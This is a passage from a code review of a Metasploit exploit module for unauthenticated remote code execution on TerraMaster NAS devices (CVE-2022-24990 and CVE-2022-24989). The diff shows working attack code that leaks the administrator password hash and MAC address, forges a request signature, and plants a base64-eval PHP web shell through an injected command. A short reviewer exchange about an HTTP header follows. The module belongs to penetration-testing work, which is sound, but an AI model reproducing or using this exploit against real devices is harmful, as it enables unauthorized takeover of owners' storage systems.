modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb

```diff
@@ -0,0 +1,258 @@
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/']),
+      OptString.new('WEBSHELL', [false, 'Web shell name with extension .php. Name will be randomly generated if left unset.', nil]),
+      OptEnum.new('COMMAND',
+                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
+    ])
+  end
+
+  def get_data
+    # Initialise variable data to store the leaked data
+    @data = {}
+
+    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`
+    # CVE-2022-24990
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),
+      'headers' => {
+        'User-Agent' => 'TNAS'
+      }
+    })
+    if res && res.code == 200 && res.body.include?('webNasIPS successful')
+      # Parse the JSON response and get the data such as admin password hash and MAC address
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip
+        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip
+        @data['key'] = @data['mac'][6..11] # last three MAC address entries
+        @data['timestamp'] = Time.new.to_i.to_s
+        # derive signature
+        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])
+      end
+    end
+  end
+
+  def tos_encrypt_str(key, str_to_encrypt)
+    id = key + str_to_encrypt
+    return Digest::MD5.hexdigest(id.encode('utf-8'))
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : datastore['WEBSHELL'].to_s)
+
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    # Upload PHP payload using vulnerable endpoint `api.php?mobile/createRaid`
+    # CVE-2022-24989
+    webshell = if target['Type'] == :php
+                 "echo '<?php @eval(base64_decode(\$_POST[\"#{@post_param}\"]));?>' > #{@webshell_name}"
+               else
+                 "echo '<?=\$_GET[\"#{@get_param}\"](base64_decode(\$_POST[\"#{@post_param}\"]));?>' > #{@webshell_name}"
+               end
+    diskstring = Rex::Text.rand_text_alpha_upper(4..8)
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'Authorization' => @data['password'],
+        'Signature' => @data['signature'],
+        'Timestamp' => @data['timestamp'],
+        'Upgrade-Insecure-Requests' => '1'
```

Comment:
Is this header necessary?

Reply:
Yes, the header is necessary, but I removed `Upgrade-Insecure-Requests` which is not needed.
See `https://github.com/rapid7/metasploit-framework/pull/18086/commits/7cd385420889d135fc7581d5360287fb94954582